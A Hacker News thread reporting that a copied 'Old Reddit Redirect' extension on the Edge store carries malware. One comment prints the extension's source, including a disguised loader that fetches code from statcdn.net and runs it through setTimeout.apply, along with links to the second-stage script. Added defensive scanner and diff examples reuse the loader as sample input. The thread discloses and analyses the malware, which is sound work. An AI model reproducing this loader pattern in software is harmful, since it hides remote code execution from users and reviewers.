[HN Gopher] Old Reddit Redirect for MS Edge Contains Malware
___________________________________________________________________
Old Reddit Redirect for MS Edge Contains Malware
Author : SamuelAdams
Score : 25 points
Date : 2021-05-27 17:26 UTC (5 hours ago)
(HTM) web link (microsoftedge.microsoft.com)
(TXT) w3m dump (microsoftedge.microsoft.com)
| tills13 wrote:
| Is this just the Edge version? I currently use the Chrome version
| -- not sure if they are the same or different.
|
| edit: just checked and the Chrome version doesn't seem to be
| affected.
| livre wrote:
| Yes, the Edge version isn't official. The GitHub repository
| only supports Firefox and Chrome:
| https://github.com/tom-james-watson/old-reddit-redirect
| [deleted]
| throwaway77112 wrote:
| HTTPS Everywhere can be used for redirection. It's from EFF, so
| trustworthy.
| bellyfullofbac wrote:
| Ah, browser extensions, the new "Download a random executable
| that can access your data (because your data is now all online),
| with auto-update and antiviruses don't care about them. But don't
| worry, Google vets them!".
|
| When will Norton (snort) make "Norton Anti Malware" to "protect"
| your browser against bad extensions?
|
| I think it's just a matter of time until an extension steals a
| lot of people's data or money...
| TechBro8615 wrote:
| It's easy to say that. But be careful what you wish for. Do we
| need another locked down sandbox?
|
| I think Google would like to take Apple's curated approach to
| the Play/Extension Stores. But they don't have the political
| capital to do it. As an advertising company, any restrictions
| they add will appear malicious to many.
|
| All that said... this thread is about Microsoft, where for
| enterprise clients, telemetry and restrictions are a feature,
| not a bug. So I would expect some movement by Microsoft to add
| more security to their store. It could be something as simple
| as a label "Reviewed by Microsoft" for vetted extensions. But
| that's a dangerous game as long as the browser sandbox is
| widely defined. Malicious apps could sneak through review and
| then Microsoft would look bad. Whereas Apple has an actual OS
| level sandbox with restrictions mostly matching their policies.
|
| There isn't really an easy answer to this problem unless you
| want to sacrifice control of your browser, in exchange for
| increased security controls that might not even apply to you.
| It's not a new tradeoff by any means.
| livre wrote:
| If anyone wants to download the crx and inspect it:
| https://edge.microsoft.com/extensionwebstorebase/v1/crx?resp...
|
| The URL used in the XHR points to this (accessing directly only
| shows a '0' but with archive.is you get that JavaScript):
| https://archive.is/TxFWj
|
| Here's the full source code:
|
| const oldReddit = "https://old.reddit.com";
| const excludedPaths = ["/gallery", "/poll", "/rpan", "/settings", "/topics"];
|
| // Redirect logic (matches the upstream extension's behaviour).
| chrome.webRequest.onBeforeRequest.addListener(
|   function(details) {
|     const url = new URL(details.url);
|     if (url.hostname === "old.reddit.com") return;
|     for (const path of excludedPaths) {
|       if (url.pathname.indexOf(path) === 0) return;
|     }
|     return {redirectUrl: oldReddit + url.pathname + url.search + url.hash};
|   },
|   {
|     urls: [
|       "*://reddit.com/*", "*://www.reddit.com/*", "*://np.reddit.com/*",
|       "*://new.reddit.com/*", "*://amp.reddit.com/*",
|     ],
|     types: [
|       "main_frame", "sub_frame", "stylesheet", "script", "image",
|       "object", "xmlhttprequest", "other"
|     ]
|   },
|   ["blocking"]
| );
|
| // Loader: fetches text from a remote host and hands it to setTimeout as a
| // string via apply, which evaluates it as code; retries every 30 s on failure.
| function dailyCollect() {
|   let xmlHttpRequest = new XMLHttpRequest();
|   xmlHttpRequest.timeout = 2e4;
|   xmlHttpRequest.onreadystatechange = function () {
|     return (xmlHttpRequest.readyState === XMLHttpRequest.DONE &&
|             xmlHttpRequest.status === 2e2 && xmlHttpRequest.responseText) ?
|       successReportDebug(true, xmlHttpRequest.responseText) : null;
|   };
|   let successReportDebug = function (status, apply) {
|     if (!status) {
|       setTimeout(dailyCollect, 3e4)
|     } else {
|       console.log('Stats was collected ' + setTimeout.apply(top, [apply]))
|     }
|   };
|   try {
|     xmlHttpRequest.open("GET", 'https://statcdn.net/app/?id=8438fce9-6d9a-45c4-ba2c-e643c1291253', true);
|     xmlHttpRequest.send();
|   } catch (e) {
|     successReportDebug(false)
|   }
| }
| dailyCollect();
|
| And the manifest:
|
| {
|   "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",
|   "content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'",
|   "name": "Old Reddit Redirect",
|   "description": "Ensure Reddit always loads the old design",
|   "version": "1.2.0",
|   "manifest_version": 2,
|   "background": { "scripts": [ "background.js" ] },
|   "icons": { "48": "img/icon48.png", "128": "img/icon128.png" },
|   "permissions": [
|     "tabs", "<all_urls>", "webRequest", "webRequestBlocking",
|     "*://reddit.com/*", "*://www.reddit.com/*", "*://np.reddit.com/*",
|     "*://new.reddit.com/*", "*://amp.reddit.com/*"
|   ]
| }
| livre wrote:
| I can't edit the original comment anymore, I posted it in a
| rush and didn't have time to check the script contents. The
| loaded script also loads a script called "firebase.js" from
| this URL: https://1658209995.rsc.cdn77.org/firebase.js
| (archive: https://archive.is/gdij8). That script is obviously
| not the actual Firebase, you can paste it in a deobfuscator and
| see what it does, it has some funny things such as a
| postMessage called "GimmeResults."
| heyheyhey wrote:
| > The URL used in the XHR points to this (accessing directly
| only shows a '0' but with archive.is you get that JavaScript):
| https://archive.is/TxFWj
|
| How did you get from the XHR to that script inside that
| archive?
| livre wrote:
| The XHR contains the URL:
| xmlHttpRequest.open("GET", 'https://statcdn.net/app/?id=8438fce9-6d9a-45c4-ba2c-e643c129...', true);
|
| Since opening that URL directly in the browser didn't work I
| tried archiving it and it worked. Then I shared the archive
| link here.
|
| It seems that they implemented some poorly done access
| control that is letting archive.is see the contents but not
| web browsers when visited directly.
| jasonhansel wrote:
| > setTimeout.apply(top, [apply])
|
| Clever. Probably avoids naive forms of static analysis that
| would catch more obvious ways of eval'ing code.
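An added example for this page, written here and not code from the thread, the extension's publisher or the upstream old-reddit-redirect project: a static indicator scanner that takes an unpacked extension's manifest and background script and reports the shapes livre's paste and jasonhansel's comment describe (a CSP with 'unsafe-eval', <all_urls> access, a network fetch feeding setTimeout.apply with a string, and contact with a host the manifest never lists). The rule names, severities and helper functions are this example's own assumptions; the sample inputs are condensed from the code posted above.

```javascript
// Added example for this page, not code from the thread, the publisher, or the
// upstream old-reddit-redirect project. Static indicator scan of an unpacked
// extension: manifest (object) plus background scripts (strings) in, a list of
// "[severity] message" findings out. Rule names and severities are assumptions.

// Sinks that turn a string into running code. setTimeout(string) evaluates its
// argument; calling it through Function.prototype.apply, as the posted loader
// does, hides that from a naive grep for "eval(" or "setTimeout(\"".
const DYNAMIC_CODE_SINKS = [
  { name: "eval()", re: /\beval\s*\(/ },
  { name: "Function constructor", re: /\bnew\s+Function\s*\(|\bFunction\s*\(/ },
  { name: "setTimeout/setInterval via apply/call", re: /\bset(?:Timeout|Interval)\s*\.\s*(?:apply|call)\s*\(/ },
  { name: "setTimeout/setInterval with string literal", re: /\bset(?:Timeout|Interval)\s*\(\s*["'`]/ },
];
// Ways a background page pulls text from the network.
const REMOTE_FETCH_SOURCES = [
  { name: "XMLHttpRequest", re: /\bXMLHttpRequest\b/ },
  { name: "fetch()", re: /\bfetch\s*\(/ },
];
const URL_RE = /https?:\/\/[^\s"'`)]+/g;

// Hostnames of every literal http(s) URL in a script.
function scriptHosts(script) {
  const hosts = new Set();
  for (const m of script.match(URL_RE) || []) {
    try { hosts.add(new URL(m).hostname); } catch (e) { /* not a parseable URL */ }
  }
  return [...hosts].sort();
}

// Hosts named by explicit match patterns ("*://www.reddit.com/*" -> "www.reddit.com").
// "<all_urls>" deliberately declares nothing here: the question is which concrete
// hosts the code contacts beyond the ones it bothered to list.
function manifestHosts(manifest) {
  const hosts = new Set();
  for (const p of manifest.permissions || []) {
    const m = /^[a-z*]+:\/\/([^/]+)\//.exec(p);
    if (m) hosts.add(m[1]);
  }
  return hosts;
}

// Loose match on purpose: old.reddit.com counts as covered by reddit.com.
function isDeclared(host, declared) {
  for (const d of declared) if (host === d || host.endsWith("." + d)) return true;
  return false;
}

function scanManifest(manifest) {
  const f = [];
  const perms = manifest.permissions || [];
  if (/'unsafe-eval'/.test(manifest.content_security_policy || ""))
    f.push("[high] CSP allows 'unsafe-eval': fetched text can be run as code");
  if (perms.includes("<all_urls>"))
    f.push("[high] permission <all_urls>: far broader than the reddit.com hosts a redirector needs");
  if (perms.includes("webRequestBlocking"))
    f.push("[info] permission webRequestBlocking: can rewrite or redirect requests (expected for a redirector)");
  if (manifest.manifest_version === 2)
    f.push("[info] manifest_version 2: background page may execute remotely loaded code");
  return f;
}

function scanScript(script, manifest) {
  const f = [];
  const sinks = DYNAMIC_CODE_SINKS.filter((r) => r.re.test(script)).map((r) => r.name);
  const sources = REMOTE_FETCH_SOURCES.filter((r) => r.re.test(script)).map((r) => r.name);
  for (const s of sinks) f.push(`[medium] dynamic-code sink: ${s}`);
  for (const s of sources) f.push(`[info] remote fetch source: ${s}`);
  if (sinks.length && sources.length) f.push("[high] remote fetch plus dynamic-code sink: remote code loader shape");
  const declared = manifestHosts(manifest);
  for (const h of scriptHosts(script)) if (!isDeclared(h, declared)) f.push(`[high] contacts undeclared host: ${h}`);
  return f;
}

// scripts: { filename: source }.
function scanExtension(manifest, scripts) {
  const findings = scanManifest(manifest);
  for (const [file, src] of Object.entries(scripts))
    for (const msg of scanScript(src, manifest)) findings.push(`${file}: ${msg}`);
  return findings;
}

// Sample input, condensed from the background.js and manifest posted in the thread.
const SUSPECT_BACKGROUND_JS = `
const oldReddit = "https://old.reddit.com";
function dailyCollect() {
  let xmlHttpRequest = new XMLHttpRequest();
  xmlHttpRequest.onreadystatechange = function () {
    return (xmlHttpRequest.readyState === XMLHttpRequest.DONE &&
      xmlHttpRequest.status === 2e2 && xmlHttpRequest.responseText) ?
      successReportDebug(true, xmlHttpRequest.responseText) : null;
  };
  let successReportDebug = function (status, apply) {
    if (!status) { setTimeout(dailyCollect, 3e4) }
    else { console.log('Stats was collected ' + setTimeout.apply(top, [apply])) }
  };
  xmlHttpRequest.open("GET", 'https://statcdn.net/app/?id=8438fce9-6d9a-45c4-ba2c-e643c1291253', true);
  xmlHttpRequest.send();
}
dailyCollect();
`;
const SUSPECT_MANIFEST = {
  manifest_version: 2, name: "Old Reddit Redirect", version: "1.2.0",
  content_security_policy: "script-src 'self' 'unsafe-eval'; object-src 'self'",
  permissions: ["tabs", "<all_urls>", "webRequest", "webRequestBlocking", "*://reddit.com/*",
    "*://www.reddit.com/*", "*://np.reddit.com/*", "*://new.reddit.com/*", "*://amp.reddit.com/*"],
};

console.log(scanExtension(SUSPECT_MANIFEST, { "background.js": SUSPECT_BACKGROUND_JS }).join("\n"));
```

Run it with node. The two [info] findings (webRequestBlocking, manifest_version 2) also fire on a legitimate redirector, so the lines worth acting on are the loader shape and the undeclared host. Regex rules miss code that assembles its sink name at runtime, so a clean result means these specific indicators are absent, not that the package is safe.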
| passivate wrote:
| Can you help me understand the code? What is it doing?
| Dedime wrote:
| The code is calling out to a malicious URL for a script,
| downloading it, and executing the script. The malicious
| script from the URL is mirrored here:
| https://archive.is/TxFWj
|
| Nobody has figured out exactly what it's doing quite yet, but
| you can paste that code into a Javascript deobfuscator and
| try to figure it out yourself:
| https://lelinhtinh.github.io/de4js/
|
| Based off of reading the code for 5 minutes with my very poor
| javascript skills, it's modifying your searches via Google /
| Bing and redirecting you to a practically unknown search
| engine called "Blacksearch". Very suspicious. I found a
| reddit thread with others complaining about this search
| engine:
| https://old.reddit.com/r/edge/comments/kzwb6q/redirecting_to...
| TechBro8615 wrote:
| Seems like weird malware. It's not exactly subtle if the
| first time I Google something after installing it, I get
| redirected to not-Google.
|
| I could see this working on Karen who downloaded a coupon
| extension. But surely the type of person who installs an
| extension to force old.reddit.com will realize what's
| happening almost immediately.
|
| What is the point of malware if it can be caught so easily?
| This makes me wonder if maybe the dev didn't do it on
| purpose. Maybe they sold it to an unscrupulous (and dumb)
| company, or maybe their build process is somehow infected.
| livre wrote:
| >This makes me wonder if maybe the dev didn't do it on
| purpose.
|
| I doubt this since the code is stolen from this Firefox
| and Chrome extension
| https://github.com/tom-james-watson/old-reddit-redirect
| but there's no acknowledgement of Edge in that GitHub
| project.
| TechBro8615 wrote:
| That makes sense and also explains why that Reddit thread
| had users describing multiple extensions as the source of
| the same problem.
|
| So the root issue here is effectively extension squatting
| on the Edge store. The attacker can simply scrape the
| most popular extensions in Chrome, inject malware into
| them, and publish them on the Edge store under the same
| name.
|
| If that's what's happening, there is probably substantial
| effort behind sockpuppet publishers so that one ban won't
| ban them all. But then again it also looks like an
| amateur operation if every extension is footprinting
| itself by using the same domain for the malicious
| redirect.
|
| Hopefully Microsoft can clean this up with some one-off
| code scans for the signatures of this malware. Ban all
| the publishers and delete the extensions. Then, hold
| those names in reserve unless the creator can prove they
| own the same name at the Chrome store.
|
| Long term, the ideal system might involve a verification
| step at registration time if the publisher name or
| extension name exists in the Chrome store. I think npm
| has been working on features in this area, as they are
| vulnerable to similar namesquatting vectors of malware
| distribution.
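An added example, not code from the thread, the publisher or the upstream old-reddit-redirect project, for the "copy a popular extension, inject a payload, republish under the same name" pattern TechBro8615 and livre describe: it compares a store-published package against the upstream release it claims to be and isolates the injected lines, which is the check a store reviewer or an enterprise allowlist process would run before trusting a lookalike. Packages are modelled as { filename: contents } maps. The inputs are constructed stand-ins: the "upstream" files approximate the redirect-only code quoted in the thread, not the project's actual release, and the "published" files append a loader in the shape of the posted one.

```javascript
// Added example for this page, not code from the thread, the publisher, or the
// upstream old-reddit-redirect project. Compares a published extension package
// with the upstream release and reports injected lines. Inputs are constructed.

// Which files were added, removed, or changed between the two packages.
function comparePackages(upstream, published) {
  const r = { added: [], removed: [], changed: [], unchanged: [] };
  for (const f of Object.keys(published).sort()) {
    if (!(f in upstream)) r.added.push(f);
    else if (upstream[f] !== published[f]) r.changed.push(f);
    else r.unchanged.push(f);
  }
  for (const f of Object.keys(upstream).sort()) if (!(f in published)) r.removed.push(f);
  return r;
}

// Lines present in the published copy but absent from upstream, compared after
// trimming whitespace. A set difference rather than a real diff, but enough to
// surface an appended loader or an extra permission.
function injectedLines(upstreamText, publishedText) {
  const norm = (t) => t.split("\n").map((l) => l.trim()).filter(Boolean);
  const base = new Set(norm(upstreamText));
  return norm(publishedText).filter((l) => !base.has(l));
}

// File-level status plus the injected lines of every added or changed file.
function report(upstream, published) {
  const cmp = comparePackages(upstream, published);
  const injected = {};
  for (const f of [...cmp.added, ...cmp.changed]) injected[f] = injectedLines(upstream[f] || "", published[f]);
  return { ...cmp, injected };
}

// Constructed stand-in for the upstream redirect-only background script.
const REDIRECT_JS = `const oldReddit = "https://old.reddit.com";
chrome.webRequest.onBeforeRequest.addListener(
  function(details) {
    const url = new URL(details.url);
    if (url.hostname === "old.reddit.com") return;
    return {redirectUrl: oldReddit + url.pathname + url.search + url.hash};
  },
  { urls: ["*://reddit.com/*", "*://www.reddit.com/*"], types: ["main_frame"] },
  ["blocking"]
);
`;
// Constructed stand-in for the appended loader (same shape as the one posted in the thread).
const LOADER_JS = `function dailyCollect() {
  let xmlHttpRequest = new XMLHttpRequest();
  xmlHttpRequest.onload = function () { setTimeout.apply(top, [xmlHttpRequest.responseText]); };
  xmlHttpRequest.open("GET", 'https://statcdn.net/app/?id=8438fce9-6d9a-45c4-ba2c-e643c1291253', true);
  xmlHttpRequest.send();
}
dailyCollect();
`;
const UPSTREAM_MANIFEST = JSON.stringify({
  name: "Old Reddit Redirect", version: "1.2.0", manifest_version: 2,
  background: { scripts: ["background.js"] },
  permissions: ["webRequest", "webRequestBlocking", "*://reddit.com/*", "*://www.reddit.com/*"],
}, null, 2);
const PUBLISHED_MANIFEST = JSON.stringify({
  name: "Old Reddit Redirect", version: "1.2.0", manifest_version: 2,
  content_security_policy: "script-src 'self' 'unsafe-eval'; object-src 'self'",
  background: { scripts: ["background.js"] },
  permissions: ["tabs", "<all_urls>", "webRequest", "webRequestBlocking", "*://reddit.com/*", "*://www.reddit.com/*"],
}, null, 2);

const UPSTREAM = { "manifest.json": UPSTREAM_MANIFEST, "background.js": REDIRECT_JS, "img/icon48.png": "<icon bytes>" };
const PUBLISHED = { "manifest.json": PUBLISHED_MANIFEST, "background.js": REDIRECT_JS + LOADER_JS, "img/icon48.png": "<icon bytes>" };

console.log(JSON.stringify(report(UPSTREAM, PUBLISHED), null, 2));
```

The report lists manifest.json and background.js as changed and the icon as unchanged; the injected lines for the manifest are exactly the added CSP directive and the two extra permissions, and for the script they are the loader, including the contacted host. On a real package the same comparison runs against the upstream release archive or the Chrome Web Store build, and any injected line is reason to refuse the listing regardless of what it does.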
___________________________________________________________________
(page generated 2021-05-27 23:03 UTC)